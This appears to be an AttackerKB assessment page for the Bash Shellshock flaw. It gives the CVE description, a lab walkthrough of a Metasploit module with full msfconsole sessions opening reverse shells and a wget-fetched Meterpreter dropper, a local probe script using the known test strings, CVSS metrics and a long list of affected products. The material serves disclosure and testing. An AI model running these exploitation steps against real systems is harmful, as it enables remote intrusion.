Attacker Value: Very High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2014-6271

Disclosure Date: September 24, 2014
Exploited in the Wild
Reported by AttackerKB Worker and 3 more...

Description

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

Technical Analysis

A golden oldie from 2014 that is still very relevant nowadays.

In my recent research into security vulnerabilities, I bumped into several targets that were still vulnerable to CVE-2014-6271, a.k.a. Shellshock, and CVE-2014-6278. You should not be surprised that most of these targets are IoT-based, with an embedded Linux/Unix image running a vulnerable bash version. They typically do not get updated at all and are easy targets for a malicious actor looking for an entry point into the network.

Metasploit modules like exploit/multi/http/apache_mod_cgi_bash_env_exec are pretty restricted when launching an attack, due to the limited platform support (only x86) and the payloads that can be leveraged in an attack. This led me to rewrite this module a bit so that it supports multiple platforms (ARM, x86, x64, MIPS) and multiple payloads such as Unix Command and Linux Dropper. The module name is multi/http/bash_env_cgi_rce.

To test the module locally, download a vulnerable bash version from https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz. Any version published before September 2014 is okay. Just extract it in a local directory and compile it with ./configure && make.

Configure Apache or any other preferred web server to support CGI scripts. You can find tons of instructions on the web on how to do that.
Just create a script like the one below using the vulnerable bash version and add it to the cgi-bin directory of your preferred web server.

#!/bin/bash_CVE_2014_6271
# The shebang points at the locally compiled bash 4.3 (installed here as
# /bin/bash_CVE_2014_6271), so the web server spawns the vulnerable interpreter
# with the request headers exported as CGI environment variables.
echo "Content-type: text/plain"
# An empty line terminates the CGI response headers.
echo
echo
echo "Hello World"

Download the module from here and follow the install instructions.
Start msfconsole and play around with the different options and payloads.

msf6 > use exploits/multi/http/bash_env_cgi_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bash_env_cgi_rce) > options

Module options (exploit/multi/http/bash_env_cgi_rce):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CVE          Automatic        yes       CVE to check/exploit (Accepted: Automatic, CVE-2014-6271, CVE-2014-6278)
   HEADER       User-Agent       yes       HTTP header to use
   METHOD       GET              yes       HTTP method to use
   PAYLOADSIZE  2048             yes       Payload size used by the CmdStager
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI                     yes       Path to CGI script
   URIPATH                       no        The URI to use for this exploit (default is random)
   VHOST                         no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


View the full module info with the info, or info -d command.

msf6 exploit(multi/http/bash_env_cgi_rce) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) > set targeturi /cgi-bin/test.cgi
targeturi => /cgi-bin/test.cgi
msf6 exploit(multi/http/bash_env_cgi_rce) > check

[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] 192.168.201.10:80 - The target is vulnerable.
msf6 exploit(multi/http/bash_env_cgi_rce) > set lhost 192.168.201.10
lhost => 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash using vulnerability CVE-2014-6271.
[*] Command shell session 1 opened (192.168.201.10:4444 -> 192.168.201.10:35766) at 2023-05-21 15:01:17 +0000

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux

Python Meterpreter payload example

msf6 exploit(multi/http/bash_env_cgi_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp using vulnerability CVE-2014-6271.
[*] Sending stage (24772 bytes) to 192.168.201.10
[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.10:35678) at 2023-05-21 15:03:48 +0000

meterpreter > sysinfo
Computer     : cerberus
OS           : Linux 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03)
Architecture : aarch64
Meterpreter  : python/linux
meterpreter > getuid
Server username: www-data
meterpreter >

Linux File dropper using payload: linux/aarch64/meterpreter_reverse_tcp

msf6 exploit(multi/http/bash_env_cgi_rce) > set target 1
target => 1
msf6 exploit(multi/http/bash_env_cgi_rce) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > set CMDSTAGER::FLAVOR wget
CMDSTAGER::FLAVOR => wget
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp using vulnerability CVE-2014-6271.
[*] Using URL: http://192.168.201.10:8080/ZzirBKe
[*] Client 192.168.201.10 (Wget/1.21.3) requested /ZzirBKe
[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.10:34346) at 2023-05-21 15:10:11 +0000
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.10
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: www-data
meterpreter >

If you use the CMDSTAGER::FLAVOR option bourne or printf, please ensure that your payload size is 2048 or below.
You can control this with the PAYLOADSIZE option.

Have fun!!!

References

Metasploit module multi/http/bash_env_cgi_rce
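The module above performs its check remotely through the CGI endpoint. When you have the interpreter itself in hand (the bash built from the 4.3 tarball in the assessment, or one pulled out of an embedded image and runnable on your box), a local probe is quicker and confirms which of the two related bugs the binary actually has. The script below is an added example and is not part of the assessment or of the Metasploit module; it wraps the widely published test strings for CVE-2014-6271 and for CVE-2014-7169 (the bug the CVE description notes was left behind by the incomplete first fix). The function names, the verdict format and the script name shellshock_check.sh are this example's own choices, not anything from the page.

```shell
#!/bin/sh
# Added example, not from the assessment or the Metasploit module: probe a
# bash binary locally for CVE-2014-6271 and CVE-2014-7169.
# Usage: sh shellshock_check.sh [/path/to/bash]   (defaults to the bash on PATH)

# CVE-2014-6271: bash imports the function from the environment and then
# keeps parsing, executing the command that trails the function body.
# Returns 0 when the trailing "echo vulnerable" ran, 1 otherwise.
check_cve_2014_6271() {
    bash_bin="$1"
    out=$(env x='() { :;}; echo vulnerable' "$bash_bin" -c 'echo this is a test' 2>/dev/null)
    case "$out" in
        *vulnerable*) return 0 ;;
        *)            return 1 ;;
    esac
}

# CVE-2014-7169: with only the first fix applied, the malformed definition
# leaks a redirection into the next command, so "echo date" becomes "date"
# with stdout written to a file literally named "echo" in the working dir.
# The probe runs in a throwaway directory so the stray file cannot land
# anywhere sensitive. Returns 0 when the file appears, 1 otherwise.
check_cve_2014_7169() {
    bash_bin="$1"
    tmp=$(mktemp -d) || return 2
    ( cd "$tmp" && env X='() { (a)=>\' "$bash_bin" -c 'echo date' >/dev/null 2>&1 )
    if [ -e "$tmp/echo" ]; then
        rm -rf "$tmp"
        return 0
    fi
    rm -rf "$tmp"
    return 1
}

# One-line verdict for a binary, e.g.
# "CVE-2014-6271=not-vulnerable CVE-2014-7169=not-vulnerable".
# Returns 2 (and prints to stderr) when there is nothing executable to probe.
shellshock_status() {
    bash_bin="${1:-$(command -v bash)}"
    if [ -z "$bash_bin" ] || [ ! -x "$bash_bin" ]; then
        echo "error: no executable bash at '$bash_bin'" >&2
        return 2
    fi
    if check_cve_2014_6271 "$bash_bin"; then r6271=vulnerable; else r6271=not-vulnerable; fi
    if check_cve_2014_7169 "$bash_bin"; then r7169=vulnerable; else r7169=not-vulnerable; fi
    echo "CVE-2014-6271=$r6271 CVE-2014-7169=$r7169"
}

# Script entry point: report on the requested (or default) bash.
shellshock_status "$@"
```

Point it at the freshly built interpreter (sh shellshock_check.sh ./bash-4.3/bash) to confirm the lab target before spending time on the web server side; a current distribution bash should report not-vulnerable for both. The later parser bugs the module also checks for (CVE-2014-6278 and its siblings) have their own probe strings and are deliberately not reproduced here.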

CVSS V3 Severity and Metrics

Base Score: 9.8 Critical
Impact Score: 5.9
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • apple,
  • arista,
  • canonical,
  • checkpoint,
  • citrix,
  • debian,
  • f5,
  • gnu,
  • ibm,
  • mageia,
  • novell,
  • opensuse,
  • oracle,
  • qnap,
  • redhat,
  • suse,
  • vmware

Products

  • arx firmware,
  • bash,
  • big-ip access policy manager,
  • big-ip access policy manager 11.6.0,
  • big-ip advanced firewall manager,
  • big-ip advanced firewall manager 11.6.0,
  • big-ip analytics,
  • big-ip analytics 11.6.0,
  • big-ip application acceleration manager,
  • big-ip application acceleration manager 11.6.0,
  • big-ip application security manager,
  • big-ip application security manager 11.6.0,
  • big-ip edge gateway,
  • big-ip global traffic manager,
  • big-ip global traffic manager 11.6.0,
  • big-ip link controller,
  • big-ip link controller 11.6.0,
  • big-ip local traffic manager,
  • big-ip local traffic manager 11.6.0,
  • big-ip policy enforcement manager,
  • big-ip policy enforcement manager 11.6.0,
  • big-ip protocol security module,
  • big-ip wan optimization manager,
  • big-ip webaccelerator,
  • big-iq cloud,
  • big-iq device,
  • big-iq security,
  • debian linux 7.0,
  • enterprise linux 4.0,
  • enterprise linux 5.0,
  • enterprise linux 6.0,
  • enterprise linux 7.0,
  • enterprise linux desktop 5.0,
  • enterprise linux desktop 6.0,
  • enterprise linux desktop 7.0,
  • enterprise linux eus 5.9,
  • enterprise linux eus 6.4,
  • enterprise linux eus 6.5,
  • enterprise linux eus 7.3,
  • enterprise linux eus 7.4,
  • enterprise linux eus 7.5,
  • enterprise linux eus 7.6,
  • enterprise linux eus 7.7,
  • enterprise linux for ibm z systems 5.9 s390x,
  • enterprise linux for ibm z systems 6.4 s390x,
  • enterprise linux for ibm z systems 6.5 s390x,
  • enterprise linux for ibm z systems 7.3 s390x,
  • enterprise linux for ibm z systems 7.4 s390x,
  • enterprise linux for ibm z systems 7.5 s390x,
  • enterprise linux for ibm z systems 7.6 s390x,
  • enterprise linux for ibm z systems 7.7 s390x,
  • enterprise linux for power big endian 5.0 ppc,
  • enterprise linux for power big endian 5.9 ppc,
  • enterprise linux for power big endian 6.0 ppc64,
  • enterprise linux for power big endian 6.4 ppc64,
  • enterprise linux for power big endian 7.0 ppc64,
  • enterprise linux for power big endian eus 6.5 ppc64,
  • enterprise linux for power big endian eus 7.3 ppc64,
  • enterprise linux for power big endian eus 7.4 ppc64,
  • enterprise linux for power big endian eus 7.5 ppc64,
  • enterprise linux for power big endian eus 7.6 ppc64,
  • enterprise linux for power big endian eus 7.7 ppc64,
  • enterprise linux for scientific computing 6.0,
  • enterprise linux for scientific computing 7.0,
  • enterprise linux server 5.0,
  • enterprise linux server 6.0,
  • enterprise linux server 7.0,
  • enterprise linux server aus 5.6,
  • enterprise linux server aus 5.9,
  • enterprise linux server aus 6.2,
  • enterprise linux server aus 6.4,
  • enterprise linux server aus 6.5,
  • enterprise linux server aus 7.3,
  • enterprise linux server aus 7.4,
  • enterprise linux server aus 7.6,
  • enterprise linux server aus 7.7,
  • enterprise linux server from rhui 5.0,
  • enterprise linux server from rhui 6.0,
  • enterprise linux server from rhui 7.0,
  • enterprise linux server tus 6.5,
  • enterprise linux server tus 7.3,
  • enterprise linux server tus 7.6,
  • enterprise linux server tus 7.7,
  • enterprise linux workstation 5.0,
  • enterprise linux workstation 6.0,
  • enterprise linux workstation 7.0,
  • enterprise manager,
  • eos,
  • esx 4.0,
  • esx 4.1,
  • flex system v7000 firmware,
  • gluster storage server for on-premise 2.1,
  • infosphere guardium database activity monitoring 8.2,
  • infosphere guardium database activity monitoring 9.0,
  • infosphere guardium database activity monitoring 9.1,
  • linux 4,
  • linux 5,
  • linux 6,
  • linux enterprise desktop 11,
  • linux enterprise desktop 12,
  • linux enterprise server 10,
  • linux enterprise server 11,
  • linux enterprise server 12,
  • linux enterprise software development kit 11,
  • linux enterprise software development kit 12,
  • mac os x,
  • mageia 3.0,
  • mageia 4.0,
  • netscaler sdx firmware,
  • open enterprise server 11.0,
  • open enterprise server 2.0,
  • opensuse 12.3,
  • opensuse 13.1,
  • opensuse 13.2,
  • pureapplication system,
  • pureapplication system 2.0.0.0,
  • qradar risk manager 7.1.0,
  • qradar security information and event manager 7.1.0,
  • qradar security information and event manager 7.1.1,
  • qradar security information and event manager 7.1.2,
  • qradar security information and event manager 7.2,
  • qradar security information and event manager 7.2.0,
  • qradar security information and event manager 7.2.1,
  • qradar security information and event manager 7.2.2,
  • qradar security information and event manager 7.2.3,
  • qradar security information and event manager 7.2.4,
  • qradar security information and event manager 7.2.5,
  • qradar security information and event manager 7.2.6,
  • qradar security information and event manager 7.2.7,
  • qradar security information and event manager 7.2.8,
  • qradar security information and event manager 7.2.8.15,
  • qradar security information and event manager 7.2.9,
  • qradar vulnerability manager 7.2.0,
  • qradar vulnerability manager 7.2.1,
  • qradar vulnerability manager 7.2.2,
  • qradar vulnerability manager 7.2.3,
  • qradar vulnerability manager 7.2.4,
  • qradar vulnerability manager 7.2.6,
  • qradar vulnerability manager 7.2.8,
  • qts,
  • qts 4.1.1,
  • san volume controller firmware,
  • security access manager for mobile 8.0 firmware 8.0.0.1,
  • security access manager for mobile 8.0 firmware 8.0.0.2,
  • security access manager for mobile 8.0 firmware 8.0.0.3,
  • security access manager for mobile 8.0 firmware 8.0.0.5,
  • security access manager for web 7.0 firmware 7.0.0.1,
  • security access manager for web 7.0 firmware 7.0.0.2,
  • security access manager for web 7.0 firmware 7.0.0.3,
  • security access manager for web 7.0 firmware 7.0.0.4,
  • security access manager for web 7.0 firmware 7.0.0.5,
  • security access manager for web 7.0 firmware 7.0.0.6,
  • security access manager for web 7.0 firmware 7.0.0.7,
  • security access manager for web 7.0 firmware 7.0.0.8,
  • security access manager for web 8.0 firmware 8.0.0.2,
  • security access manager for web 8.0 firmware 8.0.0.3,
  • security access manager for web 8.0 firmware 8.0.0.5,
  • security gateway,
  • smartcloud entry appliance 2.3.0,
  • smartcloud entry appliance 2.4.0,
  • smartcloud entry appliance 3.1.0,
  • smartcloud entry appliance 3.2.0,
  • smartcloud provisioning 2.1.0,
  • software defined network for virtual environments,
  • starter kit for cloud 2.2.0,
  • stn6500 firmware,
  • stn6800 firmware,
  • stn7800 firmware,
  • storwize v3500 firmware,
  • storwize v3700 firmware,
  • storwize v5000 firmware,
  • storwize v7000 firmware,
  • studio onsite 1.3,
  • traffix signaling delivery controller,
  • traffix signaling delivery controller 3.3.2,
  • traffix signaling delivery controller 3.4.1,
  • traffix signaling delivery controller 3.5.1,
  • traffix signaling delivery controller 4.1.0,
  • ubuntu linux 10.04,
  • ubuntu linux 12.04,
  • ubuntu linux 14.04,
  • vcenter server appliance 5.0,
  • vcenter server appliance 5.1,
  • vcenter server appliance 5.5,
  • virtualization 3.4,
  • workload deployer,
  • zenworks configuration management 10.3,
  • zenworks configuration management 11,
  • zenworks configuration management 11.1,
  • zenworks configuration management 11.2,
  • zenworks configuration management 11.3.0
